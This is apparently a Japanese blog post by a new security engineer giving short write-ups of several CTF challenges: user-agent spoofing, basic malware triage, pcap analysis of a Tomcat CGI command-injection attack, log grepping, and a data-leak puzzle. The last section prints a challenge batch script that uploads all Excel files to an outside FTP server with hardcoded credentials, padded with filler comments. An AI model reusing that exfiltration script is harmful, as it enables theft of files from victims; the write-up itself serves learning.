@toRi

できたてほやほやのエンジニアです。インフラ、セキュリティ系です。ふんわり命がけ(´・ω・)

picoCTF Secret Agent - Points: 200

無題1

アクセスしてみます。

無題1

Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。

chromeで開いてるのに??

無題1

調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。

F12→Network→NetworkConditionでGoogle のクローラ(ユーザー エージェント)をいろいろ試します。

無題1

 

Googlebotにしたらフラグがでてきました。

MNCTF 2018 新人奮闘II(マルウェア解析)

無題1

ハッシュ値、ファイルサイズは以下のように求めました。



# md5sum AD_OptimizationTool.exe
541427a9dbe43b10c05b856cdcdc5ba6  AD_OptimizationTool.exe

# sha1sum AD_OptimizationTool.exe
e0fa838e0f191f97c5dac7a831af60d750432017  AD_OptimizationTool.exe

# sha256sum AD_OptimizationTool.exe
f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29  AD_OptimizationTool.exe

# ll
-rw-r--r-- 1 root root 2048  7月 11  2018 AD_OptimizationTool.exe

コンパイル日時はプロパティから見える作成日時かな、と思ったのですが回答を貰えなかったので調べてみたら、、、PE情報を扱う専用のツールを使う必要があるとのことだったので、PEviewをインストールしました。

無題1

コンパイル日時が見つかりました!

無題1

インポート係数もみつかりました。

ちなみにstringsコマンドを実行してもインポート係数がみれました。

open
kernel32.dll
shell32.dll
user32.dll
ExitProcess
Sleep
ShellExecuteA
MessageBoxA

以下のように空欄を埋めると、フラグが得られます!

無題1

無題1

 

SendaiCTF2018 Net.2 攻撃元の特定 100(ネットワーク)

無題

とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。

Apache Tomcatの「Common Gateway Interface(CGI)」サーブレットに関して、遠隔からのコード実行(Remote Code Execution、RCE)の脆弱性が確認されました。この深刻度の高い脆弱性が悪用されると、攻撃者に任意のコマンドを実行されてしまう可能性があります。コマンドを実行するために、攻撃者はTomcatCGIサーブレットが入力値を検証する際の不具合に起因するOSコマンドインジェクションを利用します。(https://blog.trendmicro.co.jp/archives/21195

みたいに書いてありました。コマンドを実行させようとしている通信が攻撃者かなとあたりがつきます。

WireSharkでパケットを見ました。まず、HTTPにしぼります。

無題1

cmd=chmod・・・と書いてあるパケットがあるのでこれが攻撃者のものだと分かります。

MNCTF 2018 新人奮闘IV(フォレンジック )

無題1

# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin
2018/07/13 15:01,vpnadmin,27.117.128.1

前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。

MNCTF 2019 情報漏洩Ⅱ(その他) 100pts

無題1

batファイルの続きにFTPサーバーへのアクセスが見えるので、アクセスしました。

if A%USERDOMAINJkjNCIMZMscrSkoGFOOM%
echo open 157.7.53.197> temp.txt
echo P455w0rd>> temp.txt
REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
echo ftp-user>> temp.txt
echo bin>>temp.txt
REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
echo mput *.xls*>>temp.txt
echo quit>> temp.txt
REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
ftp -i -s:temp.txt
del temp.txt

ユーザー名はP455w0rd、パスワードはftp-userでした。(まさかの逆)

エクスプローラーでアクセスしたのですが、開けない、、この中身さえ見れれば、、、

無題1

FFTPというFTPのツールを使うといいみたいなので、そちらをインストールして開いてみました。

無題1

このエクセルファイルを開け、文書のタイトルが顧客情報一覧2019上半期(フラグ)ということが分かりました!それにしてもこの顧客データのエクセルファイル、リアリティ溢れてますね笑

無題